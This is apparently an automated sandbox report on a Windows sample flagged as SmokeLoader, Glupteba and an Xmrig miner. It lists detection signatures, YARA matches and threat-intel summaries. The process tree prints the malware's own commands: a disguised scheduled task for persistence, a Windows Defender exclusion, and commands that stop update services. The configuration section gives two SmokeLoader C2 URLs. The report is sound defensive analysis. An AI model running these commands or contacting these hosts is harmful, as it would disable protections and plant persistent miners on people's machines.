Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	1340695
MD5:	e2982df7bd07c80ffdd02a7d680b64bc
SHA1:	85d6417c7b391bea381eb07d56eff39efe051a04
SHA256:	3fb42de7bef728db9db776ce892a5893f84b24c433253988d849c514a4008b67
Tags:	exeSmokeLoader
Infos:

Detection

Glupteba, SmokeLoader, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

Sigma detected: Stop multiple services

Yara detected SmokeLoader

Yara detected Glupteba

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Xmrig cryptocurrency miner

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Found Tor onion address

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Sample is not signed and drops a device driver

Machine Learning detection for sample

Injects a PE file into a foreign processes

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

DNS related to crypt mining pools

Adds a directory exclusion to Windows Defender

Hides that the sample has been downloaded from the Internet (zone.identifier)

Connects to a pastebin service (likely for C&C)

Uses schtasks.exe or at.exe to add and modify task schedules

Checks if the current machine is a virtual machine (disk enumeration)

Uses powercfg.exe to modify the power settings

Modifies power options to not sleep / hibernate

Writes to foreign memory regions

Protects its processes via BreakOnTermination flag

Modifies the hosts file

Suspicious powershell command line found

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Found hidden mapped module (file has been removed from disk)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Creates driver files

Checks if the current process is being debugged

PE file contains more sections than normal

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

Contains functionality to shutdown / reboot the system

Creates files inside the system directory

Contains functionality to clear windows event logs (to hide its activities)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Found potential string decryption / allocating functions

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Detected TCP or UDP traffic on non-standard ports

Contains capabilities to detect virtual machines

Found evaded block containing many API calls

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

file.exe (PID: 5776 cmdline: C:\Users\user\Desktop\file.exe MD5: E2982DF7BD07C80FFDD02A7D680B64BC)

InstallSetup5.exe (PID: 4616 cmdline: "C:\Users\user\AppData\Local\Temp\InstallSetup5.exe" MD5: BC3354A4CD405A2F2F98E8B343A7D08D)

Broom.exe (PID: 3380 cmdline: C:\Users\user\AppData\Local\Temp\Broom.exe MD5: 00E93456AA5BCF9F60F84B0C0760A212)

toolspub2.exe (PID: 2012 cmdline: "C:\Users\user\AppData\Local\Temp\toolspub2.exe" MD5: DCBD05276D11111F2DD2A7EDF52E3386)

toolspub2.exe (PID: 1020 cmdline: "C:\Users\user\AppData\Local\Temp\toolspub2.exe" MD5: DCBD05276D11111F2DD2A7EDF52E3386)

explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

cmd.exe (PID: 2532 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 4620 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 1424 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 4072 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 4904 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powershell.exe (PID: 4928 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1484 cmdline: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1616 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5944 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 5332 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 6404 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 7152 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 6812 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 7116 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powershell.exe (PID: 4340 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 6888 cmdline: C:\Windows\System32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2532 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 880 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

powershell.exe (PID: 4132 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

e0cbefcb1af40c7d4aff4aca26621a98.exe (PID: 3392 cmdline: "C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe" MD5: 2A92DBDA3DF9502DEF5E1C9009950699)

powershell.exe (PID: 2736 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

e0cbefcb1af40c7d4aff4aca26621a98.exe (PID: 2032 cmdline: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe MD5: 2A92DBDA3DF9502DEF5E1C9009950699)

powershell.exe (PID: 5172 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

latestX.exe (PID: 4024 cmdline: "C:\Users\user\AppData\Local\Temp\latestX.exe" MD5: BAE29E49E8190BFBBF0D77FFAB8DE59D)

powershell.exe (PID: 6060 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TrustedInstaller.exe (PID: 2436 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: D098F2FC042FBF6879D47E3A86FBB4A1)

svchost.exe (PID: 5224 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cmd.exe (PID: 6264 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 6092 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 5720 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 6732 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 5932 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 5944 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5268 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 1008 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 1540 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 2996 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 4000 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

updater.exe (PID: 6820 cmdline: C:\Program Files\Google\Chrome\updater.exe MD5: BAE29E49E8190BFBBF0D77FFAB8DE59D)

cdttvvc (PID: 3492 cmdline: C:\Users\user\AppData\Roaming\cdttvvc MD5: DCBD05276D11111F2DD2A7EDF52E3386)

cdttvvc (PID: 6044 cmdline: C:\Users\user\AppData\Roaming\cdttvvc MD5: DCBD05276D11111F2DD2A7EDF52E3386)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Glupteba	Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.	No Attribution	http://resources.infosecinstitute.com/tdss4-part-1/ https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/ https://blog.google/technology/safety-security/new-action-combat-cyber-crime/ https://blog.google/threat-analysis-group/disrupting-glupteba-operation/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/	https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: SmokeLoader

{"Version": 2020, "C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
file.exe	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0xc926dd:$s1: Runner 0xc92842:$s3: RunOnStartup 0xc926f1:$a1: Antis 0xc9271e:$a2: antiVM 0xc92725:$a3: antiSandbox 0xc92731:$a4: antiDebug 0xc9273b:$a5: antiEmulator 0xc92748:$a6: enablePersistence 0xc9275a:$a7: enableFakeError 0xc9286b:$a8: DetectVirtualMachine 0xc92890:$a9: DetectSandboxie 0xc928bb:$a10: DetectDebugger 0xc928ca:$a11: CheckEmulator

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Broom.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\Windows\Temp\whxcdqscjswq.tmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Windows\Temp\whxcdqscjswq.tmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4cb268:$a1: mining.set_target 0x4c6a48:$a2: XMRIG_HOSTNAME 0x4c8540:$a3: Usage: xmrig [OPTIONS] 0x4c6a20:$a4: XMRIG_VERSION
C:\Windows\Temp\whxcdqscjswq.tmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Windows\Temp\whxcdqscjswq.tmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d1fc8:$s3: \\.\WinRing0_ 0x4ca4c8:$s4: pool_wallet 0x4c62d0:$s5: cryptonight 0x4c62e0:$s5: cryptonight 0x4c62f0:$s5: cryptonight 0x4c6300:$s5: cryptonight 0x4c6318:$s5: cryptonight 0x4c6328:$s5: cryptonight 0x4c6338:$s5: cryptonight 0x4c6350:$s5: cryptonight 0x4c6360:$s5: cryptonight 0x4c6378:$s5: cryptonight 0x4c6390:$s5: cryptonight 0x4c63a0:$s5: cryptonight 0x4c63b0:$s5: cryptonight 0x4c63c0:$s5: cryptonight 0x4c63d8:$s5: cryptonight 0x4c63f0:$s5: cryptonight 0x4c6400:$s5: cryptonight 0x4c6410:$s5: cryptonight

Memory Dumps

Source	Rule	Description	Author	Strings
0000003F.00000002.4558997865.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000003F.00000003.2708781420.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000003F.00000003.2708852084.0000000001958000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000003F.00000003.2684879397.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
0000003F.00000002.4558997865.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000003F.00000003.2708747670.0000000001975000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000011.00000002.4575750686.0000000002F10000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000000.2106864524.0000000000401000.00000020.00000001.01000000.00000008.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
0000003F.00000003.2708491367.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000003F.00000002.4572426073.0000000001950000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000011.00000002.4575377290.0000000002B16000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000009.00000002.2281261302.00000000004E1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000009.00000002.2281261302.00000000004E1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
0000003F.00000003.2707785171.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000011.00000003.2270531809.0000000003C42000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000003.00000002.2155575698.0000000000952000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x63d6:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000003F.00000003.2708950297.0000000001963000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000003F.00000002.4558997865.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000027.00000002.2684843852.00007FF7FA9B0000.00000004.00000001.01000000.0000000E.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000027.00000002.2684843852.00007FF7FA9B0000.00000004.00000001.01000000.0000000E.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4f3088:$a1: mining.set_target 0x4ee868:$a2: XMRIG_HOSTNAME 0x4f0360:$a3: Usage: xmrig [OPTIONS] 0x4ee840:$a4: XMRIG_VERSION
00000039.00000002.2540236474.0000000000A82000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x6306:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000009.00000002.2281176476.00000000004B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000009.00000002.2281176476.00000000004B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000011.00000002.4575750686.0000000003353000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
0000003F.00000003.2708399343.0000000001979000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000003F.00000003.2708993303.000000000196E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000003B.00000002.2612331641.00000000004E1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000003B.00000002.2612331641.00000000004E1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Process Memory Space: e0cbefcb1af40c7d4aff4aca26621a98.exe PID: 3392	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
Click to see the 32 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
57.2.cdttvvc.a515a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
9.2.toolspub2.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
3.2.toolspub2.exe.8315a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
59.2.cdttvvc.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
39.2.updater.exe.7ff7fa9d7e20.1.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
39.2.updater.exe.7ff7fa9d7e20.1.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ca268:$a1: mining.set_target 0x4c5a48:$a2: XMRIG_HOSTNAME 0x4c7540:$a3: Usage: xmrig [OPTIONS] 0x4c5a20:$a4: XMRIG_VERSION
39.2.updater.exe.7ff7fa9d7e20.1.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d0241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
39.2.updater.exe.7ff7fa9d7e20.1.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d07a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d0fc8:$s3: \\.\WinRing0_ 0x4c94c8:$s4: pool_wallet 0x4c52d0:$s5: cryptonight 0x4c52e0:$s5: cryptonight 0x4c52f0:$s5: cryptonight 0x4c5300:$s5: cryptonight 0x4c5318:$s5: cryptonight 0x4c5328:$s5: cryptonight 0x4c5338:$s5: cryptonight 0x4c5350:$s5: cryptonight 0x4c5360:$s5: cryptonight 0x4c5378:$s5: cryptonight 0x4c5390:$s5: cryptonight 0x4c53a0:$s5: cryptonight 0x4c53b0:$s5: cryptonight 0x4c53c0:$s5: cryptonight 0x4c53d8:$s5: cryptonight 0x4c53f0:$s5: cryptonight 0x4c5400:$s5: cryptonight 0x4c5410:$s5: cryptonight
4.0.Broom.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
39.2.updater.exe.7ff7fa990000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
39.2.updater.exe.7ff7fa990000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x511c88:$a1: mining.set_target 0x50d468:$a2: XMRIG_HOSTNAME 0x50ef60:$a3: Usage: xmrig [OPTIONS] 0x50d440:$a4: XMRIG_VERSION
39.2.updater.exe.7ff7fa990000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x517c61:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
